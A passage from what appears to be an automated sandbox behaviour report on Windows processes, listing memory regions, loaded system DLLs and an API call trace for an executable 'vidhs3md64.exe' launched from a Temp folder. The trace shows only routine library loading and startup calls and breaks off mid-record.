entry_point = 0x173d6b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9649 start_va = 0x7ff7fd240000 end_va = 0x7ff7fd33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd240000" filename = "" Region: id = 9650 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9651 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9652 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9653 start_va = 0x173d770000 end_va = 0x173d7affff entry_point = 0x0 region_type = private name = "private_0x000000173d770000" filename = "" Region: id = 9654 start_va = 0x173d7b0000 end_va = 0x173d91ffff entry_point = 0x0 region_type = private name = "private_0x000000173d7b0000" filename = "" Region: id = 9655 start_va = 0x7ff7fd36b000 end_va = 0x7ff7fd36cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd36b000" filename = "" Region: id = 9656 start_va = 0x173d540000 end_va = 0x173d546fff entry_point = 0x0 region_type = private name = "private_0x000000173d540000" filename = "" Region: id = 9657 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9658 start_va = 0x173d7b0000 end_va = 0x173d7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173d7b0000" filename = "" Region: id = 9659 start_va = 0x173d910000 end_va = 0x173d91ffff entry_point = 0x0 region_type = private name = "private_0x000000173d910000" filename = "" Region: id = 9660 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9661 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9662 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9663 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9664 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9665 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9666 start_va = 0x173d7c0000 end_va = 0x173d7c6fff entry_point = 0x0 region_type = private name = "private_0x000000173d7c0000" filename = "" Region: id = 9667 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9668 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9669 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9670 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9671 start_va = 0x173d920000 end_va = 0x173daa7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173d920000" filename = "" Region: id = 9672 start_va = 0x173d7d0000 end_va = 0x173d7d0fff entry_point = 0x0 region_type = private name = "private_0x000000173d7d0000" filename = "" Region: id = 9673 start_va = 0x173d7e0000 end_va = 0x173d7e0fff entry_point = 0x0 region_type = private name = "private_0x000000173d7e0000" filename = "" Region: id = 9674 start_va = 0x173dab0000 end_va = 0x173dc30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173dab0000" filename = "" Region: id = 9675 start_va = 0x173dc40000 end_va = 0x173f03ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173dc40000" filename = "" Region: id = 9676 start_va = 0x173f040000 end_va = 0x173f19ffff entry_point = 0x0 region_type = private name = "private_0x000000173f040000" filename = "" Region: id = 9696 start_va = 0x173d7f0000 end_va = 0x173d82ffff entry_point = 0x0 region_type = private name = "private_0x000000173d7f0000" filename = "" Region: id = 9697 start_va = 0x7ff7fd369000 end_va = 0x7ff7fd36afff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd369000" filename = "" Region: id = 9698 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 9699 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 9700 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9701 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 9702 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 9703 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 9704 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 9705 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 9706 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 9707 start_va = 0x173f040000 end_va = 0x173f13ffff entry_point = 0x0 region_type = private name = "private_0x000000173f040000" filename = "" Region: id = 9708 start_va = 0x173f190000 end_va = 0x173f19ffff entry_point = 0x0 region_type = private name = "private_0x000000173f190000" filename = "" Region: id = 9815 start_va = 0x173f1a0000 end_va = 0x173f4d6fff entry_point = 0x173f1a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9816 start_va = 0x173d570000 end_va = 0x173d590fff entry_point = 0x173d570000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 9817 start_va = 0x173d830000 end_va = 0x173d888fff entry_point = 0x173d830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9818 start_va = 0x173f4e0000 end_va = 0x173f6f1fff entry_point = 0x0 region_type = private name = "private_0x000000173f4e0000" filename = "" Region: id = 9819 start_va = 0x173f700000 end_va = 0x173f91cfff entry_point = 0x0 region_type = private name = "private_0x000000173f700000" filename = "" Region: id = 9820 start_va = 0x173f920000 end_va = 0x173fa35fff entry_point = 0x0 region_type = private name = "private_0x000000173f920000" filename = "" Region: id = 9821 start_va = 0x173fa40000 end_va = 0x173fc50fff entry_point = 0x0 region_type = private name = "private_0x000000173fa40000" filename = "" Region: id = 9822 start_va = 0x173fc60000 end_va = 0x173fd6bfff entry_point = 0x0 region_type = private name = "private_0x000000173fc60000" filename = "" Region: id = 9831 start_va = 0x173d570000 end_va = 0x173d5affff entry_point = 0x0 region_type = private name = "private_0x000000173d570000" filename = "" Region: id = 9832 start_va = 0x173d830000 end_va = 0x173d830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173d830000" filename = "" Region: id = 9833 start_va = 0x7ff7fd36d000 end_va = 0x7ff7fd36efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd36d000" filename = "" Region: id = 9834 start_va = 0x173d830000 end_va = 0x173d8e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173d830000" filename = "" Region: id = 9835 start_va = 0x173d8f0000 end_va = 0x173d8f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173d8f0000" filename = "" Region: id = 9836 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 9837 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 9838 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 9839 start_va = 0x173d900000 end_va = 0x173d906fff entry_point = 0x0 region_type = private name = "private_0x000000173d900000" filename = "" Region: id = 9840 start_va = 0x173f040000 end_va = 0x173f044fff entry_point = 0x173f040000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 9841 start_va = 0x173f130000 end_va = 0x173f13ffff entry_point = 0x0 region_type = private name = "private_0x000000173f130000" filename = "" Region: id = 9842 start_va = 0x173f050000 end_va = 0x173f050fff entry_point = 0x173f050000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 9843 start_va = 0x173f060000 end_va = 0x173f061fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173f060000" filename = "" Region: id = 9844 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 9845 start_va = 0x173f070000 end_va = 0x173f070fff entry_point = 0x173f070000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 9846 start_va = 0x173f080000 end_va = 0x173f081fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173f080000" filename = "" Region: id = 9847 start_va = 0x173f070000 end_va = 0x173f070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173f070000" filename = "" Thread: id = 981 os_tid = 0xc10 Thread: id = 984 os_tid = 0xc20 Thread: id = 985 os_tid = 0xc24 Thread: id = 990 os_tid = 0xc3c Process: id = "141" image_name = "vidhs3md64.exe" filename = "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe" page_root = "0x64554000" os_pid = "0xc30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "133" os_parent_pid = "0xd14" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9777 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9778 start_va = 0x30000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9779 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 9780 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 9781 start_va = 0x7f5da000 end_va = 0x7f5dafff entry_point = 0x0 region_type = private name = "private_0x000000007f5da000" filename = "" Region: id = 9782 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9783 start_va = 0x140000000 end_va = 0x140045fff entry_point = 0x140000000 region_type = mapped_file name = "vidhs3md64.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe") Region: id = 9784 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 9785 start_va = 0x7ff5ffff5000 end_va = 0x7ff5ffff5fff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffff5000" filename = "" Region: id = 9786 start_va = 0x7ff5ffffd000 end_va = 0x7ff5ffffefff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffd000" filename = "" Region: id = 9787 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9790 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 9791 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9848 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9849 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9850 start_va = 0x2c0000 end_va = 0x37dfff entry_point = 0x2c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9851 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 9852 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9853 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9854 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9855 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9856 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 9857 start_va = 0x7ff5ffffb000 end_va = 0x7ff5ffffcfff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffb000" filename = "" Region: id = 9858 start_va = 0x7ffaf7930000 end_va = 0x7ffaf7a07fff entry_point = 0x7ffaf7930000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 9859 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9860 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9861 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9862 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 9863 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 9864 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 9865 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 9866 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 9867 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9868 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9869 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 9870 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 9871 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 9892 start_va = 0x7ffae5c40000 end_va = 0x7ffae5ce9fff entry_point = 0x7ffae5c40000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 9893 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 9894 start_va = 0x180000 end_va = 0x1b3fff entry_point = 0x180000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9895 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 9896 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9897 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9898 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 9899 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 9900 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 9901 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9902 start_va = 0x610000 end_va = 0x790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9903 start_va = 0x7a0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 9904 start_va = 0x1ba0000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Thread: id = 988 os_tid = 0xc34 [0296.179] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0296.179] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName=0x1400212e0) returned 0x7ffaf70f02a0 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsFree") returned 0x7ffaf70f23f0 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsGetValue") returned 0x7ffaf70e63c0 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsSetValue") returned 0x7ffaf70ed920 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffaf70f5620 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateEventExW") returned 0x7ffaf70f5580 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSemaphoreExW") returned 0x7ffaf70f55e0 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadStackGuarantee") returned 0x7ffaf70f0e10 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolTimer") returned 0x7ffaf70ef110 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolTimer") returned 0x7ffaf7a4cb10 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7ffaf7a55790 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolTimer") returned 0x7ffaf7a4ea10 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolWait") returned 0x7ffaf70f28c0 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolWait") returned 0x7ffaf7a4c470 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolWait") returned 0x7ffaf7a55410 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlushProcessWriteBuffers") returned 0x7ffaf7aa42f0 [0296.180] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7ffaf7a895e0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentProcessorNumber") returned 0x7ffaf7aa3130 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLogicalProcessorInformation") returned 0x7ffaf70f0fb0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSymbolicLinkW") returned 0x7ffaf7112720 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetDefaultDllDirectories") returned 0x7ffaf4f0e7a0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="EnumSystemLocalesEx") returned 0x7ffaf71128e0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CompareStringEx") returned 0x7ffaf70e6010 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetDateFormatEx") returned 0x7ffaf7112a00 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLocaleInfoEx") returned 0x7ffaf70f0310 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTimeFormatEx") returned 0x7ffaf7112bc0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetUserDefaultLocaleName") returned 0x7ffaf70f25d0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsValidLocaleName") returned 0x7ffaf7112cd0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="LCMapStringEx") returned 0x7ffaf70e6000 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentPackageId") returned 0x7ffaf4ea45e0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTickCount64") returned 0x7ffaf70e65a0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0296.181] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0296.182] GetCurrentThreadId () returned 0xc34 [0296.182] GetStartupInfoW (in: lpStartupInfo=0x14fe90 | out: lpStartupInfo=0x14fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, 